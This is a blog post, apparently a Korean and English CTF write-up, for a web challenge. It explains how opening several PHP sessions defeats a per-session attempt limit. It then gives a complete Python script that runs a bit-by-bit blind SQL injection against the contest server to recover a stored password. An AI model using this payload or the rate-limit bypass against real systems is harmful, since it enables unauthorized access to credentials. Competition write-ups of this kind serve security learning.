이번 대회는 포너블 몇개랑 웹 두개를 풀었는데,
포너블들은 정말 지저분하게 풀었고, 깔끔하게 나오는 익스플로잇이 이것밖에 없어서.. 이 익스플로잇만 올립니다.
처음에 이 문제를 보고, wechall에 있는 md5를 blind injection으로 횟수제한 걸고 맞추는 문제를 떠올렸는데,
그게 페이크였던것 같다
여기선 md5도 아니고, 문서에 잇는 문자를 랜덤으로 가져오는데,
30글자가 모두 소문자라고 하더라도, 한 문자당 5번, 총 150번 정도는 필요하다.
물론 time-based도 가능은 하지만, 시간도 오래 걸리고, CTF에서는 정확도가 떨어진다. (서버상태때문)
근데 문득 든 생각이, IP 하나가, 여러개의 세션을 만들 수 있다라는 것이다.
그리고 DB에는 하나의 패스워드 (가장 마지막으로 만든 세션의 패스워드)만 저장이 된다.
즉, 카운트가 120이 아닌, 실제로는 무한대라는것.
그래서, 익스플로잇에서는 처음에 여러개의 세션을 만들고,
한 세션으로 5글자씩 알아내는 방법으로 알아낸후,
최종 세션을 이용해 정답을 제출한다.
As you see the following code, first, I made multiple sessions.
Each sessions have their own 'cnt' variable.
But, in mysql database, only the password of last session is saved.
After that, the password is compared with IP address, not session.
So, although I use different sessions, I can access to a same password.
(It means that the counting is meaningless)
after I extract the password, auth password using the last session.
- import httplib
- import urllib
- import sys
- import time
- conn = httplib.HTTPConnection('58.229.183.24',80)
- conn.connect()
- session_header = '95hem28h053quulk22r5696me'
- answer = ""
- # create sessions
- for i in range(0, 10):
- ch = chr(ord('0') + i)
- print "Session make: "+ch
- conn.putrequest('GET', '/5a520b6b783866fd93f9dcdaf753af08/index.php')
- conn.putheader('Cookie', 'PHPSESSID='+session_header+ch+';')
- conn.endheaders()
- resp = conn.getresponse()
- data = resp.read()
- # injection
- for aa in range(0, 10):
- ch = chr(ord('0') + aa)
- for k in range(1 + aa*5, 6 + aa*5):
- #i=96
- i=0
- for m in range(1, 9):
- query = "' or substr(LPAD(bin(ascii(substr(password,"+str(k)+",1))),8,0),"+str(m)+",1)=0x31 and 'a' = 'a"
- params = 'password='+urllib.quote(query)
- conn.putrequest('POST', '/5a520b6b783866fd93f9dcdaf753af08/index.php')
- conn.putheader('Content-length', str(len(params)))
- conn.putheader('Content-Type', 'application/x-www-form-urlencoded')
- conn.putheader('Cookie', 'PHPSESSID='+session_header + ch +';')
- conn.endheaders()
- conn.send(params)
- resp = conn.getresponse()
- data = resp.read()
- if "True" in data:
- i += pow(2,8-m)
- print str(m)+" "+str(i)
- answer = answer + chr(i)
- print "Find: "+answer
- if len(answer) == 30:
- break
- print "Answer: "+answer
- print "Session: "+session_header+'9'
- conn.close()
'Computer Security > CTF' 카테고리의 다른 글
[Defcon 2014] 100 lines exploit (0) | 2014.05.19 |
---|---|
[RuCTF 2014 quals] Reversing 500 (0) | 2014.03.11 |
[secuinside 2013] debugd exploit (2) | 2013.11.28 |
[Secuinside 2013] angry danbi exploit (3) | 2013.11.27 |
Whitehat Contest 개인전 예선 보고서 (2) | 2013.09.12 |